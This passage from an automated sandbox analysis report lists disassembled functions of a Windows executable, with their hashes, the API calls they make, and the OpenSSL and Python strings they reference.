                                                                                                                                                                                                                            • Opcode ID: 45a713974226c8b02de7ab96b89ee31757bb0f036f706dfce3701e360fdcebdc
                                                                                                                                                                                                                            • Instruction ID: 72d1e5538a15584c36a4254803a9f93df8dea58f7770aa694ef0e7c01a719815
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 45a713974226c8b02de7ab96b89ee31757bb0f036f706dfce3701e360fdcebdc
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3F818C32E0834285FB669F2B81542782EB0AF11B4CF758035DA8ED7297DFADE9419781
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: R_new$R_set_debugX_new$X_free
                                                                                                                                                                                                                            • String ID: ..\s\ssl\t1_enc.c$tls1_change_cipher_state
                                                                                                                                                                                                                            • API String ID: 1274617517-2635170098
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875006833.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                                                                                                            • String ID: csm
                                                                                                                                                                                                                            • API String ID: 2395640692-1018135373
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875006833.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                                                                                            • String ID: csm$csm
                                                                                                                                                                                                                            • API String ID: 3896166516-3733052814
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875006833.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CallEncodePointerTranslator
                                                                                                                                                                                                                            • String ID: MOC$RCC
                                                                                                                                                                                                                            • API String ID: 3544855599-2084237596
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: R_newR_set_debug
                                                                                                                                                                                                                            • String ID: ..\s\ssl\s3_enc.c$ssl3_change_cipher_state
                                                                                                                                                                                                                            • API String ID: 193678381-4073342769
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: R_newR_set_debug
                                                                                                                                                                                                                            • String ID: ..\s\ssl\statem\statem_clnt.c$ossl_statem_client_post_process_message
                                                                                                                                                                                                                            • API String ID: 193678381-2213881910
                                                                                                                                                                                                                            • Opcode ID: 28588e69a9be004c7670403fff7a4f93f1a3905f124f13f4986fd2152f73ee77
                                                                                                                                                                                                                            • Instruction ID: 36e88a4f2873a8dda09630621ad5aa24bb9409c52a71ec95e0ccb513d1252ee2
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 28588e69a9be004c7670403fff7a4f93f1a3905f124f13f4986fd2152f73ee77
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4EF08162B041424BE3489734D872FE97350EB45714F584231DA7DC6ADADE2CE542CB00
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • CreateDirectoryW.KERNEL32(00000000,?,00007FF60299324C,?,?,00007FF602993964), ref: 00007FF602997592
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875006833.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CreateDirectory
                                                                                                                                                                                                                            • String ID: %.*s$%s%c$\
                                                                                                                                                                                                                            • API String ID: 4241100979-1685191245
                                                                                                                                                                                                                            • Opcode ID: 1ca419821233d0601be0ec0fdd22f0615f5bb27aa990e3ab57c5365e74305e49
                                                                                                                                                                                                                            • Instruction ID: d45638a0e549f7fffc32c2255adeb0b49f8667c23f3eed40429705442ca1ac0e
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1ca419821233d0601be0ec0fdd22f0615f5bb27aa990e3ab57c5365e74305e49
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3C31FD61B29AC149FA619B26E4103FA6755FF48BF8F640231EE5D837CADE6CD611C700
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: R_newR_set_debug
                                                                                                                                                                                                                            • String ID: ..\s\ssl\statem\extensions_clnt.c$tls_construct_ctos_psk_kex_modes
                                                                                                                                                                                                                            • API String ID: 193678381-3633525602
                                                                                                                                                                                                                            • Opcode ID: bedc7f2cf9229473a6431eed86ed2ba14f76d67bc90ca4df0f70c24d59441cda
                                                                                                                                                                                                                            • Instruction ID: dc7866cd875928a06561f34318b2e76e021f749b1f6949de8347d539a88ff30a
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bedc7f2cf9229473a6431eed86ed2ba14f76d67bc90ca4df0f70c24d59441cda
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 21215E11B1828211F764A712A965BBA67449F85B88F480230ED3DDBACFDE6DED414700
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1878127469.00007FFE0CFD1000.00000020.00000001.01000000.0000002B.sdmp, Offset: 00007FFE0CFD0000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffe0cfd0000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: _wassertmemcpy
                                                                                                                                                                                                                            • String ID: hs->curlen < BLOCK_SIZE$src/MD5.c
                                                                                                                                                                                                                            • API String ID: 785382960-3464417081
                                                                                                                                                                                                                            • Opcode ID: 5b6906f2ce9179d28796ded443e0c626bcd02fd7e08f6dda9b73451038638397
                                                                                                                                                                                                                            • Instruction ID: d912130b740e86f5c4baa8af0859339a5855e41e048d49f97a1622cd2dc5eacd
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5b6906f2ce9179d28796ded443e0c626bcd02fd7e08f6dda9b73451038638397
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 43217F61B5869186EB549F19E14437D63A2FF85B8CF188035DE8A17B6ACE3CD8418781
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID: ..\s\ssl\statem\extensions_srvr.c$tls_construct_stoc_alpn
                                                                                                                                                                                                                            • API String ID: 0-862372828
                                                                                                                                                                                                                            • Opcode ID: 812ebe87b0cf5cf7d240ba28627a6c2be49b9a584a7a7c81d67cc74ed2d95c10
                                                                                                                                                                                                                            • Instruction ID: 5b9f3554fd9098e352950a558e5cce3591228ca4c066680dfee5058a8983935d
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 812ebe87b0cf5cf7d240ba28627a6c2be49b9a584a7a7c81d67cc74ed2d95c10
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 78211D50B0814341FBA4A622A931BFA53909F457C8F881235ED7DCB7CBDE6DE9419744
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: R_newR_set_debug
                                                                                                                                                                                                                            • String ID: ..\s\ssl\statem\extensions_clnt.c$tls_construct_ctos_alpn
                                                                                                                                                                                                                            • API String ID: 193678381-4282401781
                                                                                                                                                                                                                            • Opcode ID: 1f74c8e94b485edefa14d9c83d6de6a7f2a170bd93a411e68520797306d91e77
                                                                                                                                                                                                                            • Instruction ID: 8c5d30f8a439e7daf496043c49bdb955a4f8b46b5b719db1d9a30e060293e8a9
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1f74c8e94b485edefa14d9c83d6de6a7f2a170bd93a411e68520797306d91e77
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6F21AF51B0858241F7609656E569FBA1390EF457C8F181230DE3DCBADADF6DD5828710
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
• Associated: 00000001.00000002.1877067967.00007FFDFF240000.00000002.00000001.01000000.00000013.sdmp
• Associated: 00000001.00000002.1877092897.00007FFDFF2C3000.00000020.00000001.01000000.00000013.sdmp
• Associated: 00000001.00000002.1877173635.00007FFDFF2C5000.00000002.00000001.01000000.00000013.sdmp
• Associated: 00000001.00000002.1877203803.00007FFDFF2ED000.00000008.00000001.01000000.00000013.sdmp
• Associated: 00000001.00000002.1877227349.00007FFDFF2F1000.00000004.00000001.01000000.00000013.sdmp
• Associated: 00000001.00000002.1877249900.00007FFDFF2F2000.00000002.00000001.01000000.00000013.sdmp
• Associated: 00000001.00000002.1877249900.00007FFDFF2F8000.00000002.00000001.01000000.00000013.sdmp
• Associated: 00000001.00000002.1877249900.00007FFDFF300000.00000002.00000001.01000000.00000013.sdmp
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: R_newR_set_debug
                                                                                                                                                                                                                            • String ID: ..\s\ssl\statem\extensions_srvr.c$tls_construct_stoc_etm
                                                                                                                                                                                                                            • API String ID: 193678381-2359301497
                                                                                                                                                                                                                            • Opcode ID: fadffb2917693f2f04d81bcd8fe93670a899bdb0f3ddd29a04072c7e06c19dfb
                                                                                                                                                                                                                            • Instruction ID: a4164067efaa1f4162e96e2c27fed7a8bab3c4fde70fb6133c095b597d797c33
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fadffb2917693f2f04d81bcd8fe93670a899bdb0f3ddd29a04072c7e06c19dfb
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FD21C351B1800286F774CB06E574BBE2390DB447DCF580230DA3DCB6DADE2DD8819704
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: O_indentO_printf
                                                                                                                                                                                                                            • String ID: %s=0x%x (%s)$UNKNOWN
                                                                                                                                                                                                                            • API String ID: 1860387303-4219816433
                                                                                                                                                                                                                            • Opcode ID: 3028389455207f4400ca3fab79cf2094c72d0b6b32480db97ca3597aae6de28d
                                                                                                                                                                                                                            • Instruction ID: f8cb7ea538cdeace1aaa029cbfa678de90d829ae60ca7bf66427194641c9c4fa
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3028389455207f4400ca3fab79cf2094c72d0b6b32480db97ca3597aae6de28d
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 70214D32B08B9185D7248F16E46096977A0FB89B90F444235EBFDC7BD9DE3CE5518B00
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: R_newR_set_debug
                                                                                                                                                                                                                            • String ID: ..\s\ssl\statem\statem_srvr.c$tls_handle_status_request
                                                                                                                                                                                                                            • API String ID: 193678381-662828239
                                                                                                                                                                                                                            • Opcode ID: 128a7ac4e5730906a20882eb69817aa0aeaa0437cbf13b301e390fda9a1e28bb
                                                                                                                                                                                                                            • Instruction ID: d85554e585a4c2a3b1724b5fccb3542518b35bdbf7017b8aff05edfb0041799e
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 128a7ac4e5730906a20882eb69817aa0aeaa0437cbf13b301e390fda9a1e28bb
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3821DF22B0564289FB549F56E468BB83390EB81B14F4C9235CE7CCA3DADF2C9581CB00
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: R_newR_set_debug
                                                                                                                                                                                                                            • String ID: ..\s\ssl\s3_lib.c$ssl3_ctx_ctrl
                                                                                                                                                                                                                            • API String ID: 193678381-780421027
                                                                                                                                                                                                                            • Opcode ID: 19c2a0fa7603b50d19c5e3d664a25978ee8d6031513b7addd96108387032f82c
                                                                                                                                                                                                                            • Instruction ID: 1fa8c698b4656f918df1e4f57ad7f50565e33cb8f0aa6043b55aedde38d58fcc
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 19c2a0fa7603b50d19c5e3d664a25978ee8d6031513b7addd96108387032f82c
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9121FC13E28FC583E7418B28D6512B86320F7A9748F49A321DFAC56297EF68F6D4C710
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID: ..\s\ssl\statem\extensions_clnt.c$tls_construct_ctos_etm
                                                                                                                                                                                                                            • API String ID: 0-2790762957
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: R_newR_set_debug
                                                                                                                                                                                                                            • String ID: ..\s\ssl\statem\statem_clnt.c$tls_process_hello_req
                                                                                                                                                                                                                            • API String ID: 193678381-485657334
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875006833.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Message$ByteCharMultiWide
                                                                                                                                                                                                                            • String ID: Error/warning (ANSI fallback)$Warning
                                                                                                                                                                                                                            • API String ID: 1878133881-2698358428
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875006833.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Message$ByteCharMultiWide
                                                                                                                                                                                                                            • String ID: Error$Error/warning (ANSI fallback)
                                                                                                                                                                                                                            • API String ID: 1878133881-653037927
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • PyErr_SetString.PYTHON312(?,?,?,?,?,00007FFDFABD1EBC), ref: 00007FFDFABD3C1F
                                                                                                                                                                                                                              • Part of subcall function 00007FFDFABD1FB0: strncmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFDFABD1FE8
                                                                                                                                                                                                                              • Part of subcall function 00007FFDFABD1FB0: strncmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFDFABD2006
                                                                                                                                                                                                                            • PyErr_Format.PYTHON312 ref: 00007FFDFABD1F33
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875123056.00007FFDFABD1000.00000020.00000001.01000000.00000019.sdmp, Offset: 00007FFDFABD0000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdfabd0000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Err_strncmp$FormatString
                                                                                                                                                                                                                            • String ID: name too long$undefined character name '%s'
                                                                                                                                                                                                                            • API String ID: 3882229318-4056717002
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: R_newR_set_debug
                                                                                                                                                                                                                            • String ID: ..\s\ssl\statem\statem_srvr.c$tls_construct_cert_status_body
                                                                                                                                                                                                                            • API String ID: 193678381-3528029177
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: O_printf
                                                                                                                                                                                                                            • String ID: %02X$%s (len=%d):
                                                                                                                                                                                                                            • API String ID: 601296420-4138326432
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: O_printf$O_indent
                                                                                                                                                                                                                            • String ID: %s (%d)$unexpected value
                                                                                                                                                                                                                            • API String ID: 1715996925-1289549259
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: R_newR_set_debug
                                                                                                                                                                                                                            • String ID: ..\s\ssl\statem\statem_srvr.c$ossl_statem_server_construct_message
                                                                                                                                                                                                                            • API String ID: 193678381-3648037868
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875006833.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2718003287-0
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6029ABDCB), ref: 00007FF6029ABEFC
                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6029ABDCB), ref: 00007FF6029ABF87
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875006833.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ConsoleErrorLastMode
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 953036326-0
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875123056.00007FFDFABD1000.00000020.00000001.01000000.00000019.sdmp, Offset: 00007FFDFABD0000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdfabd0000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: strncmp
                                                                                                                                                                                                                            • String ID: CJK UNIFIED IDEOGRAPH-$HANGUL SYLLABLE
                                                                                                                                                                                                                            • API String ID: 1114863663-87138338
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: B_exCalc_D_priv_bytes_exL_cleanseN_bin2bn
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1900010111-0
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875006833.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: LongWindow$DialogInvalidateRect
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1956198572-0
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Calc_D_priv_bytes_exL_cleanseN_bin2bn
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2662037904-0
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: O_find_typeO_get_data
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 280995463-0
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: X509_$E_dupE_freeL_sk_pushX509_get_subject_name
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 417592659-0
                                                                                                                                                                                                                            • Opcode ID: 16b76ce0269332f82dbb777da5921929977a1e7509ba376f46e0c547e1790b72
                                                                                                                                                                                                                            • Instruction ID: 977acf098dea6e3dd5d5f34de3c365da21033f0960b2b10e8c6570032e89bbed
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 16b76ce0269332f82dbb777da5921929977a1e7509ba376f46e0c547e1790b72
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 01012C25F0A64245FF999766B165BB953909F48BD8F4C0631EE3CCA7CEFE2CE8914600
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2933794660-0
                                                                                                                                                                                                                            • Opcode ID: db2a8fc3af55ce99db508a7d0662d03d14f2565e6c8d38b916340992943ce863
                                                                                                                                                                                                                            • Instruction ID: bda7a5ca2c7c2eb85c00cddeb63c91b11bc1924d36c7fefa0433452c1ccc75cd
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: db2a8fc3af55ce99db508a7d0662d03d14f2565e6c8d38b916340992943ce863
